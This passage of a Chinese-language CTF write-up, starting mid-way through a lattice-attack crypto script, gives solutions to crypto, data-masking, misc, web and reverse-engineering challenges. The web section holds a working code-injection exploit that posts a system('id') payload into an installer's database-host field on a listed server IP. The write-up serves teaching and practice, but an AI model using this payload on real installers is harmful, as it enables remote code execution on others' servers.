e74ebfba16f0660737719c8ad435981b5b8df89a23,0xd7e718dafb753084cb7c1deee139f6e158a0228bbf9b0ae5ed3a8b3d2508ce62e4e32cd43a3135540b31e052e6e3a0dba3ae623c69d74da34387c3429b6f0487,0xbff5ab718c54909a34ba8ab5787cbfb0c9c57394350b71744d5751f577cefda87cc8263b21dd2c21a8f19fff8362c3371fcb054dddb1293df7d6efe2d661e4ab,0xb946ad47cf1f9186c1eeaeed12f21b41a29f9fb74b14f577c97731004b372c5f41023aafc9b93557c984ff87dd263b293aa500c3a2ce1f0815319263cf7c42d5,0x9b93853dc5f4c052fdda339f69c625bc98ffdbde439078458b84278e34542f9110863e5beef166a766f565f7a815ec4a462510b42f81454b65e648622c610b27,0xae050aaa86b9580747efa33561973597d7d7a0684a45219eed3224ebc37fdf067ed61a29ecaa501266c9bcdd16b850c0dd40da3f964a5b03ae60c3967fd55913,0xea57b0482a876d49a3e21bb885bda0aae21f5fcf2521f7e1db771998b6b639d0833c17d7c8c67c12ce9b60e4210e068f98344a8cabc5faa17a048100bab797bb,0x9f866ad27c9ea2fb29168ec6db0f7755221484d0c89bfef0cd70fc2ed14fda15f7b59bbca2e23f40b5effeb9e53ad821e06cf986b34da4407c85bfbf78d2920b,0xab0939605dcff5d1ec8405b6daeb65eccc6e3b5956601dddea95c6310ac32bfeec1bab6b83e85371078a16ea9489050175098d39488aaed2a190c647fe2b1b69,0xe85698e04d8bedbac2c7884c914b7026dbb1dd5134c4a5a8e7541b07c8a94ab3d2f12eb7f1171ccd564054e1dc63d5ac044e5c5552870b419fef35a572199239,0xea94663e103e4354fb7feb80b11d06c7e16feb7265f69ee882180baba70fa075df24e3fe1ad12a99f054cabf4a3f5e4823416d4c4daa02ca51ce3926034186db,0x93662718294005f4ac8f79b0799e240a05eea871ef07d623ea7c68ef818b3b55fb4f9b6f06c399726e59cec03389053b448f187404cddb93cb3c55e3d12cebc9]
cs =[0x4aae29aaaab89fbc672db400c41d1ad3ffce937e7810065bed552c12101fb778046d22b00c05bbc3f61825b5af3c3e57f1abaafe3d9a58a573a905e2a1cecde7,0x502a1c23ef44f174aaedb9a49705eb72f805bab13e82d599525ea7484cc11f2e7c4475526b4be344390e46bcb8bcdaba2768c6321f8ca5482666171eee498f28,0x546f2276b59b7186ef5b9a04e0ba2691648d005fc780303411a1082ea3b05be127a10e26921a4b84b14d8acc45a6c32a0142ac6eb396415ecb5841a01b775b5d,0x43986eb7208b66dd86c12f953e10b2d3907873151170278393b6a4f7ea518ab5745e2db5f4dbec84087c4817c5df10e743f35ed1190515aba34832b1b274bf2e,0x7b2e448342bc7409ed891cdbf5137014f417866097297302085d8800458495e374fba8398d069f1c1c7792a9f03194e36921c378308de18313fb9b62db45cc0a,0x41ac8f265bc96ae868256fb08caf0a43a547346522b5d90cb9489c87cd5d726447d20354332dd3cb771003eddfa9c4bfa6923ae45ac8c0994f7cce46a3302eea,0x51b59ad39b388fdb2056279e2de02d32d36b52da1cc1fe4f6843964273b4585704e21405e2528e5894bd4fdb436c382a5f7d3849f9c5d7902be74edd2b16a31c,0x4e52d207f16a6f42497b25600e039de3ce49d7945ac2201ac12bf9fa9b3dc136f35328cbe9d3f9d4204d90f29fe1ce209c8904c99de0f85c5c572d05609095a6,0x6485f505cd8296e9f1c9abdc39eebc6e767e98e1587b18878fa8a582a012bb609c2f36daffc2b9c460514bc47533525ce6835e7f8123331a833958fa47f2e40,0x1ff809e71ab0347a8a9ec4356d5b8fbf109ade5881e5b59ac14adaaef2034fc40880e495070442513f42434fa8cbfcd9bce0501574997b35939f201ba1c87872,0x5b3fad73b402fcc1148758d80a61f637257d35f2773c8dc9f22859a01aecaa37a37858232ab5b3e3622f234bf35bb02a6e93ecd5a06182b61e583d0193afaf55,0x640e3556a526209f8528fbe678da3914d912a7e701abc3d4fcd65d84bcdbfc22623dfa3db31f9585a615c6de869b39c040dbfe94bb7eafd91bde15c4b87bd2c0,0x335b0ff42f39541539752faade7510a301a861720d85958ce2890ddca9e0693b342604a5b134a0974ea21dc0dc0a156c01159898e5f87e16b4a56121c2e3bbb5,0x89621740ec8b81065457105685666dfe6e31ee4f0a6efa6901e20ad6e5ea19ba438ea92f632764e52ccfb1ed35639443b5536f19ca69e9c295c6f5287a5e31b,0x1e4162060327045be0f5a0ae5d7b87c60b928e4669450339af64a39ae45b108eb58bbe83e15bef7a5c92243b213adc3e9d3514632249314bf5b588df6202ae10,0x5d10e308a16f8cd5c53b3ecd1081624e6eed4c3bfe522a8b7daf301aa6fc370b0a1cff1db7ea27aa6f5200903b365c53bc6d890ca1167ca57de87f80c5321742,0x434ac82b1ed073a1d73606ffe973e316768368fb522644f6cc76d2a0e6b83f533524c7589113aeb2db35d50c2f9ff64ceb27958a93d47b6875b8eb9b158ebaac,0x7cf3028273ece2a8af9790d3a689875bf7a3894e351a639d88fa13de05dc7f18be20ddeef4414a31b0f3dd65291e5d4d47d098027dbec25d4bc5409c017f0b03,0x5d0eefe7de32360d7950d96d821ce06741b737a1dca016cb003f75e380f5c8e3d9b8505b0eda21b36879a6455d1f640bdac5ad648b97d80eacf406b57bb1d692,0x4e4c6156da7f71123e1b4efde4a436985c6f2cccdc9b182735a75153927c6e7dc94693ab7fdd8646821a9d42eeb76c1be54984f81296a10e689805975185bf2c,0x68db6b837d968569ba944591efb36587f0022b05cefbedaad1e1d7652d0c233d1c0b036364f25e0865c7a1dab8d9d1081f23928a3573b5ec711e5b7f32714a4,0x333db46bc5fb83cbbf68475fd612bcad6becd30f95bf5b9ab6058ed0777fcb78cfe6da5c3386799fe9a1d6616801154ae7f45e35612de08efed7e2e750088b8e,0x70d4dc8986c228e12329af934c08f7c0ca94ce6913b5c641c59b3cf629a1957f82d4f40aaa7faa765c75e4f994a8222a4d08e045fb529da5ee277e1b9540c148,0x20421569b3bc73da4505760f7798a504f2276e6df9c9e48320b23201fb682021d168f6ee657fc2080722eb576ac78bf4b63ad7419983a05196fa0724fc4886d,0x5f523df584f43d7eff229d562793c8e5d4713d9c80bd40b95434c34c982324f7c282ac2fe3ac151cb62435b85bece2ef115c6f4b7a33d47dcbfa8360f89b91ac,0x7cbedea149640064a93cb75b909804ee7a896e17da808579206d1db7523b98bdf15bdc70e267e0a201bf293f980c1b5304337a7a78cc655aca07b9818b7169ab,0x62b34eaac3d3a2b360805cc23147ff8754a9d90788461107a5c8cc7053a0910ca7af45035d333c9a0b7cf6a2c13c9c367ad8eea0ccda2a6d8e089b5ee07a76ef,0x3e1c31f988e238869fad4794beb32164fa3bf3880041d1f9f2a65e2679f951491fcbeff1aa067313bf02100ae15d1af4d87050db05cec934e077c3eec238b72,0x3c056ad33432e1cf5548ae3a6db21ee1471eb70619e0ad542bd38dd80f37b76b571ae6469bacd33f9618b7a61b8e8424fc33cae479375df72b064a5d1b8cd90f,0x4caf081f5b949e65115e18b613ad8dc1fc208d2c5bea710b27b1db11d4a7eecc455c13f2fd92481f8cfea3e6fa75c0a58a154f12b6ce92c66107f617fd7ed7d8]
enc=0x191eb43459bd0f2d5ece00ab52c612668bb4c161014641a6e4afb41020465d7b82e9b60a55ab831bb5695f2fd832d08258c752ebf27ba0374b7b11b001b2629a
t = len(rs)
kbits = 400
K = 2 ** kbits
P = identity_matrix(t) * p
RC = matrix([[-1, 0], [0, 1]]) * matrix([rs, cs])
KP = matrix([[K / p, 0], [0, K]])
M = block_matrix([[P, 0], [RC, KP]], subdivide=False)
shortest_vector = M.LLL()
x = shortest_vector[1, -2] / K * p % p
print(x)
G=GF(p)
factors, exps = zip(*factor(p - 1))
primes = [factors[i] ^ exps[i] for i in range(len(factors))]
print(primes)
dlogs = []
for fac in primes[:-1]:
t = (p - 1) // fac
dlog = discrete_log(G(pow(enc, t, p)), G(pow(x, t, p)))
dlogs += [dlog]
s = (p - 1) // primes[-1]
print(s)
res = crt(dlogs, primes[:-1])
for i in range(100):
if b'flag{'in long_to_bytes(res + i * s):
print(long_to_bytes(res + i * s))
break二、数据安全
1.结构化数据识别
使用AI生成几个对对应的验证函数并提取每一行来判断同时满足4个条件的数据即可,最后的数据进行md5处理。
import re
from datetime import datetime
import hashlib
import pandas as pd
def is_sfz(id_number):
if not isinstance(id_number, str) or len(id_number) != 18:
return False
if not re.match(r"^\d{17}[\dXx]$", id_number):
return False
if not id_number[:6].isdigit():
return False
try:
birth_date = datetime.strptime(id_number[6:14], "%Y%m%d")
if birth_date > datetime.now():
return False
if birth_date.year < datetime.now().year - 150:
return False
except ValueError:
return False
weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
check_codes = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
total = 0
for i in range(17):
total += int(id_number[i]) * weights[i]
calculated_check_code = check_codes[total % 11]
if id_number[-1].upper() != calculated_check_code:
return False
return True
def is_phone_number(phone_number):
if not isinstance(phone_number, str) or len(phone_number) != 11:
return False
if not phone_number.isdigit():
return False
if phone_number[0] != '1'or not ('3' <= phone_number[1] <= '9'):
return False
return True
def is_email(email):
if not isinstance(email, str) or not email or len(email) > 254:
return False
# 正则表达式匹配RFC 5322标准的基本邮箱格式
pattern = r"""
^ # 开始
[a-zA-Z0-9] # 必须以字母数字开头
[a-zA-Z0-9._%+-]{0,63} # 中间字符(最多64字符)
@ # @符号
[a-zA-Z0-9.-]{1,63} # 域名部分
\. # 最后一个点
[a-zA-Z]{2,} # 顶级域名(至少2字符)
$ # 结束
"""
email_regex = re.compile(pattern, re.VERBOSE)
if not email_regex.match(email):
return False
if".."in email or"--"in email:
return False
local_part, domain = email.split('@', 1)
if len(local_part) > 64:
return False
if len(domain) > 253:
return False
domain_parts = domain.split('.')
for part in domain_parts:
if not part or part.startswith('-') or part.endswith('-'):
return False
return True
def is_yhk(card_number):
card_number = ''.join(filter(str.isdigit, str(card_number)))
if len(card_number) < 13 or len(card_number) > 19:
return False
total = 0
reverse_digits = card_number[::-1]
for i, digit in enumerate(reverse_digits):
num = int(digit)
if i % 2 == 1:
num *= 2
if num > 9:
num = (num // 10) + (num % 10)
total += num
return total % 10 == 0
def is_ok(sfz, phone, email, yhk):
if is_sfz(sfz) and is_phone_number(phone) and is_email(email) and is_yhk(yhk):
return True
count = 0
excel_obj = pd.read_excel("data.xlsx")
data = excel_obj.iloc[:, 0:4].values.tolist()
for one in data:
if is_ok(one[0], one[1], one[2], one[3]):
count += 1
print(hashlib.md5(str(count).encode('utf-8')).hexdigest())
'''
082a8bbf2c357c09f26675f9cf5bcba3
'''2.数据脱敏
处理规则:
- 身份证:前6位+**
- 手机号:前3后3中间*
- 邮箱:@前除.外全*
- 银行卡:前4后10中间*
- 姓名:2字首+* / 3字首尾+* / 4字首尾+**
- 性别→未知
- 微信号:全*
import pandas as pd
from hashlib import md5 as hasher
PROCESSORS = [
#身份证号脱敏
('身份证号', lambda x: x[:6] + '*'*(len(x)-6)),
('Email', lambda e: ''.join('*'if c != '.'else'.'for c in e.split('@')[0]) + '@' + e.split('@')[1]),
('手机号', lambda p: f"{str(p)[:3]}*****{str(p)[-3:]}"),
('性别', lambda _: "未知"),
('银行卡号', lambda c: str(c)[:4] + '*'*(len(str(c))-14) + str(c)[-10:]),
('姓名', lambda n: (
n[0]+'*'*(len(n)-1) if len(n)==2else
n[0]+'*'+n[2] if len(n)==3else
n[0]+'**'+n[3] if len(n)==4else n
)),
('微信号', lambda w: '*'*len(w))
]
raw_data = pd.read_excel('data.xlsx')
modified = raw_data.copy()
for column, processor in PROCESSORS:
modified[column] = modified[column].apply(processor)
FIELD_ORDER = ['姓名', '手机号', '身份证号', '银行卡号', 'Email', '性别', '微信号']
concat_parts = []
for _, row in modified[FIELD_ORDER].iterrows():
row_str = ''
for field in FIELD_ORDER:
row_str += str(row[field])
concat_parts.append(row_str)
full_string = ''.join(concat_parts)
# 计算md5
digest = hasher(full_string.encode('utf-8')).hexdigest()
print(digest)最终得到flag:b54cc7298aaaae763d605cf87bcd714a
三、misc
1.black_white
观察图片后面部分,有一个倒序的图片,将其提取出来再写个脚本还原。
source_file = open("tmp.png", "rb")
try:
image_content = source_file.read()
reversed_content = image_content[::-1]
output_file = open("result.png", "wb")
try:
output_file.write(reversed_content)
finally:
output_file.close()
finally:
source_file.close()
针对两张图像开展处理,对其像素进行黑白二值化转换,以数值1表征黑色像素,数值0表征白色像素。在对多种像素运算方法进行试验和分析后,发现异或(XOR)运算能够有效提取出特定zip文件。
from PIL import Image
def open_image(image_path):
"""
打开指定路径的图片
:param image_path: 图片的文件路径
:return: 打开的图片对象
"""
try:
return Image.open(image_path)
except FileNotFoundError:
print(f"错误:未找到图片文件 {image_path}")
return None
def print_image_dimensions(image):
"""
打印图片的宽度和高度
:param image: 图片对象
"""
if image:
width, height = image.size
print(f"图片宽度: {width}, 图片高度: {height}")
def convert_image_to_binary(image):
"""
将图片转换为二进制字符串,白色像素用 '0' 表示,黑色像素用 '1' 表示
:param image: 图片对象
:return: 二进制字符串
"""
binary_string = ""
if image:
width, height = image.size
for y in range(height):
for x in range(width):
pixel = image.getpixel((x, y))
if pixel == 255:
binary_string += '0'
elif pixel == 0:
binary_string += '1'
else:
print(f"发现非黑白像素值: {pixel}")
return binary_string
def binary_string_to_int(binary_str):
"""
将二进制字符串转换为整数
:param binary_str: 二进制字符串
:return: 对应的整数
"""
return int(binary_str, 2) if binary_str else0
def write_bytes_to_file(byte_data, file_path):
"""
将字节数据写入指定文件
:param byte_data: 字节数据
:param file_path: 文件路径
"""
try:
with open(file_path, 'wb') as file:
file.write(byte_data)
print(f"数据已成功写入 {file_path}")
except Exception as e:
print(f"写入文件时出错: {e}")
# 打开两张图片
image_one = open_image("black_white.png")
image_two = open_image("result.png")
# 打印图片尺寸
print_image_dimensions(image_one)
print_image_dimensions(image_two)
# 将图片转换为二进制字符串并转换为整数
binary_int_one = binary_string_to_int(convert_image_to_binary(image_one))
binary_int_two = binary_string_to_int(convert_image_to_binary(image_two))
# 打印转换后的字节数据
print(binary_int_one.to_bytes(900, 'big'))
print(binary_int_two.to_bytes(900, 'big'))
# 执行异或运算
xor_result = binary_int_one ^ binary_int_two
# 打印异或结果的字节数据
print(xor_result.to_bytes(900, 'big'))
# 将异或结果写入文件
write_bytes_to_file(xor_result.to_bytes(900, 'big'), "out1.zip")根据上面代码,得到一个zip压缩包,解压后,得到一个flag名文件,修改16进制前2位为424D,后缀修改为bmp,可得到一个类似汉信码图片,将其放在左下角在ps上修改一下,可得下面图片。
找个在线网站识别,可得flag:
2.Knn
通过已有的数据训练,生成预测的结果,k值调整到50,出来的数据a车为0,b车为1,组合起来flag{e0f095bd-16e6-4bf5-a1\xe35-3dce1d693aa5}
import pandas as pd
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import LabelEncoder
# 1. 设置路径
train_path = "新能源汽车检测数据.csv"
test_path = "待检测新能源车.csv"
output_path = "预测结果.csv"
# 2. 读取CSV数据
df_train = pd.read_csv(train_path, encoding='gbk')
df_test = pd.read_csv(test_path, encoding='gbk')
# 3. 训练数据准备
# 提取标签列(第一列)并做编码:A车 -> 0, B车 -> 1
label_encoder = LabelEncoder()
y_train = label_encoder.fit_transform(df_train.iloc[:, 0]) # 名称列(A车/B车)
X_train = df_train.iloc[:, 1:].values # 特征列
# 4. 测试数据准备(跳过序号列)
X_test = df_test.iloc[:, 1:].values
# 5. 建立 KNN 模型并训练(k=5,可调)
knn = KNeighborsClassifier(n_neighbors=50)
knn.fit(X_train, y_train)
# 6. 预测
y_pred = knn.predict(X_test)
# 7. 把数字标签还原成“A车”/“B车”
pred_labels = label_encoder.inverse_transform(y_pred)
# 8. 写入结果列并保存
df_test["预测车型"] = pred_labels
df_test.to_csv(output_path, index=False, encoding='gbk') # 保存为GBK防止中文乱码
print("✅ 预测完成,已保存为:", output_path)
flag{e0f095bd-16e6-4bf5-a1\xe35-3dce1d693aa5}其中有不准确的数据,导致有一位出问题,通过遍历翻转单个0,1 得到真实flag{e0f095bd-16e6-4bf5-a1c5-3dce1d693aa5}
from itertools import product
import pandas as pd
def flip_bit(byte_str, bit_idx):
lst = list(byte_str)
lst[bit_idx] = '1' if lst[bit_idx] == '0' else '0'
return ''.join(lst)
def is_flag_format(text):
if not text.startswith("flag{") or not text.endswith("}"):
return False
inside = text[5:-1]
parts = inside.split("-")
return (
len(parts) == 5
and all(p.isalnum() for p in parts)
and [len(p) for p in parts] == [8, 4, 4, 4, 12]
)
# 原始二进制字符串
new_bin_str = "011001100110110001100001011001110111101101100101001100000110011000110000001110010011010101100010011001000010110100110001001101100110010100110110001011010011010001100010011001100011010100101101011000010011000111100011001101010010110100110011011001000110001101100101001100010110010000110110001110010011001101100001011000010011010101111101"
# 拆分为字节
new_bin_list = [new_bin_str[i:i+8] for i in range(0, len(new_bin_str), 8)]
length = len(new_bin_list)
# 逐字节逐位翻转并检查合法 flag
results = []
for idx in range(length):
for bit in range(8):
modified = new_bin_list.copy()
modified[idx] = flip_bit(modified[idx], bit)
try:
test_bytes = bytes([int(b, 2) for b in modified])
text = test_bytes.decode()
if is_flag_format(text):
results.append((idx + 1, bit + 1, text))
except:
continue
# 去重并展示
unique_results = list(set([text for _, _, text in results]))
print(unique_results)四、web
1.这网页怪怪的
302跳转,burp抓包,然后提示访问yunnuuu.php,存在若类型和文件包含漏洞,文件包含flag文件。
base64解码即可得flag。
2.EasyIntall
审计代码,发现危险函数不多,找到一个文件写入点:
找调用这个函数的地方,发现只有一个调用,在安装的第三个步骤中。
参数是从cookie中取出来再传进去的因此可控,但是不知道数据格式。找到第二步中有所体现。
因此向step2提交相关信息就能获取到cookie,直接在任意位置进行代码注入即可,找到配置文件模板如下:
<?php
return array(
'DB_TYPE' => '[DB_TYPE]', // 数据库类型
'DB_HOST' => '[DB_HOST]', // 服务器地址
'DB_NAME' => '[DB_NAME]', // 数据库名
'DB_USER' => '[DB_USER]', // 用户名
'DB_PWD' => '[DB_PWD]', // 密码
'DB_PORT' => '[DB_PORT]', // 端口
'DB_PREFIX' => '[DB_PREFIX]', // 数据库表前缀
);
?>在服务器地址处进行代码注入,通过访问返回的php文件位置完成RCE,exp:
import requests
url = "http://115.29.176.197:23303/install.php?s=/install/step2.html"
data = "db[]=mysqli&db[]=xxx'.system('id').'&db[]=dbname&db[]=root&db[]=123456aA.&db[]=3306&db[]=test_&admin[]=admin&admin[]=123&admin[]=test12&admin[]=test12&admin[]=test1@qq.com"
print(requests.post(url, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"}).text)五、能源行业
1.usb
提取数据:
# USB HID 键盘扫描码到字符的映射
KEYCODE_MAP = {
0x04: 'a', 0x05: 'b', 0x06: 'c', 0x07: 'd', 0x08: 'e', 0x09: 'f', 0x0A: 'g', 0x0B: 'h',
0x0C: 'i', 0x0D: 'j', 0x0E: 'k', 0x0F: 'l', 0x10:'m', 0x11: 'n', 0x12: 'o', 0x13: 'p',
0x14: 'q', 0x15: 'r', 0x16:'s', 0x17: 't', 0x18: 'u', 0x19: 'v', 0x1A: 'w', 0x1B: 'x',
0x1C: 'y', 0x1D: 'z', 0x1E: '1', 0x1F: '2', 0x20: '3', 0x21: '4', 0x22: '5', 0x23: '6',
0x24: '7', 0x25: '8', 0x26: '9', 0x27: '0', 0x28: '\n', 0x29: 'Escape', 0x2A: 'Backspace',
0x2B: 'Tab', 0x2C:' ', 0x2D: '-', 0x2E: '=', 0x2F: '[', 0x30: ']', 0x31: '\\', 0x32: ';',
0x33: '\'', 0x34: '`', 0x35: ',', 0x36: '.', 0x37: '/', 0x38: 'Caps Lock', 0x39: 'F1',
0x3A: 'F2', 0x3B: 'F3', 0x3C: 'F4', 0x3D: 'F5', 0x3E: 'F6', 0x3F: 'F7', 0x40: 'F8',
0x41: 'F9', 0x42: 'F10', 0x43: 'F11', 0x44: 'F12', 0x45: 'Print Screen', 0x46: 'Scroll Lock',
0x47: 'Pause', 0x48: 'Insert', 0x49: 'Home', 0x4A: 'Page Up', 0x4B: 'Delete', 0x4C: 'End',
0x4D: 'Page Down', 0x4E: 'Right Arrow', 0x4F: 'Left Arrow', 0x50: 'Down Arrow', 0x51: 'Up Arrow',
0x52: 'Num Lock', 0x53: 'Keypad /', 0x54: 'Keypad *', 0x55: 'Keypad -', 0x56: 'Keypad +',
0x57: 'Keypad Enter', 0x58: 'Keypad 1', 0x59: 'Keypad 2', 0x5A: 'Keypad 3', 0x5B: 'Keypad 4',
0x5C: 'Keypad 5', 0x5D: 'Keypad 6', 0x5E: 'Keypad 7', 0x5F: 'Keypad 8', 0x60: 'Keypad 9',
0x61: 'Keypad 0', 0x62: 'Keypad .', 0x63: 'Non-US # and ~', 0x64: 'Application', 0x65: 'Power',
0x66: 'Keypad =', 0x67: 'F13', 0x68: 'F14', 0x69: 'F15', 0x6A: 'F16', 0x6B: 'F17', 0x6C: 'F18',
0x6D: 'F19', 0x6E: 'F20', 0x6F: 'F21', 0x70: 'F22', 0x71: 'F23', 0x72: 'F24', 0x73: 'Execute',
0x74: 'Help', 0x75: 'Menu', 0x76: 'Select', 0x77: 'Stop', 0x78: 'Again', 0x79: 'Undo',
0x7A: 'Cut', 0x7B: 'Copy', 0x7C: 'Paste', 0x7D: 'Find', 0x7E: 'Mute', 0x7F: 'Volume Up',
0x80: 'Volume Down'
}
def decode_usb_keyboard_data(data):
"""
解码 USB 键盘数据
:param data: 十六进制字符串形式的 USB 键盘数据
:return: 解码后的按键信息列表
"""
try:
# 将十六进制字符串转换为字节
bytes_data = bytes.fromhex(data.replace(" ", ""))
keys = []
# 从第 2 个字节开始解析按键信息
for i in range(2, len(bytes_data)):
keycode = bytes_data[i]
if keycode in KEYCODE_MAP:
keys.append(KEYCODE_MAP[keycode])
return keys
except ValueError:
print("输入的不是有效的十六进制字符串")
return []
if __name__ == "__main__":
try:
with open('out.txt', 'r') as file:
for line in file:
line = line.strip()
decoded_keys = decode_usb_keyboard_data(line)
print(f"解码行数据 '{line}' 的按键信息:", decoded_keys)
except FileNotFoundError:
print("文件 out.txt 不存在")
或者
2.Lava
Strings 能看到 3.95 的魔改upx加固:
先010看看特征,发现以下位置被修改:
改完保存为lavatk,再找3.95的upx就能脱壳了。
核心逻辑如下:
RC4算法的特征看下图。
算法有魔改,因此找个C语言RC4板子,稍许修改以下内容。
#include <stdio.h>
unsigned char S_Box[256] = { 0 };
// RC4 initial
void Init(unsigned char* key, int keyLen) {
unsigned char T[256] = { 0 };
for (int i = 0; i < 256; i++) {
S_Box[i] = i;
T[i] = key[i % keyLen];
}
int j = 0;
for (int i = 0; i < 256; i++) {
j = (j + S_Box[i] + T[i]) % 256;
unsigned char tmp = S_Box[i];
S_Box[i] += S_Box[j];
S_Box[j] += tmp;
}
return;
}
// RC4 Encryption and Decryption (The same)
void RC4(unsigned char* key, int keyLen, unsigned char* data, int dataLen) {
Init(key, keyLen);
int i = 0, j = 0;
for (int k = 0; k < dataLen; k++) {
i = (i + 1) % 256;
j = (j + S_Box[i]) % 256;
unsigned char tmp = S_Box[i];
S_Box[i] = S_Box[j];
S_Box[j] = tmp;
data[k] += S_Box[(S_Box[i] + S_Box[j]) % 256];
}
}
// Hex to Char
const char HexChar[16] = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' };
void hex2char(unsigned char* hex, unsigned char* chr, int hexLen) {
int lastIdx = 0;
for (int i = 0; i < hexLen; i++) {
int index = 0;
for (index = 0; index < 16; index++) {
if (HexChar[index] == hex[i]) {
break;
}
}
if (index == 16) {
printf("Please check your hex string at POSITION [%d] again.\n", i);
return;
}
if (i & 1) chr[i / 2] = lastIdx * 16 + index;
else lastIdx = index;
}
return;
}
int main() {
unsigned char key_hex[] = "726334497345617379";
unsigned char data_hex[] = "643ad079b9e975526ee9fb0e52241cb62be486f86952533e3c8eb01662e6987f";
int keyLen = 9, dataLen = 32;
unsigned char key[10] = { 0 };
unsigned char data[33] = { 0 };
hex2char(key_hex, key, keyLen * 2);
hex2char(data_hex, data, dataLen * 2);
RC4(key, keyLen, data, dataLen);
printf("\n[*]RC4 Encrypt/Decrypt result: ");
printf("\n%s",data);
return 0;
}测试结果如下:
从而,得到flag{2404c9b8af2dd18f92dd9018c85f76fe}。
原文转载链接地址:https://mp.weixin.qq.com/s/IWJFA2yqAhXUVtcn8ixRwA
附件下载地址:
链接: https://pan.baidu.com/s/1WS561KFHpqRsefhJ8l19KA?pwd=yxr8 提取码: yxr8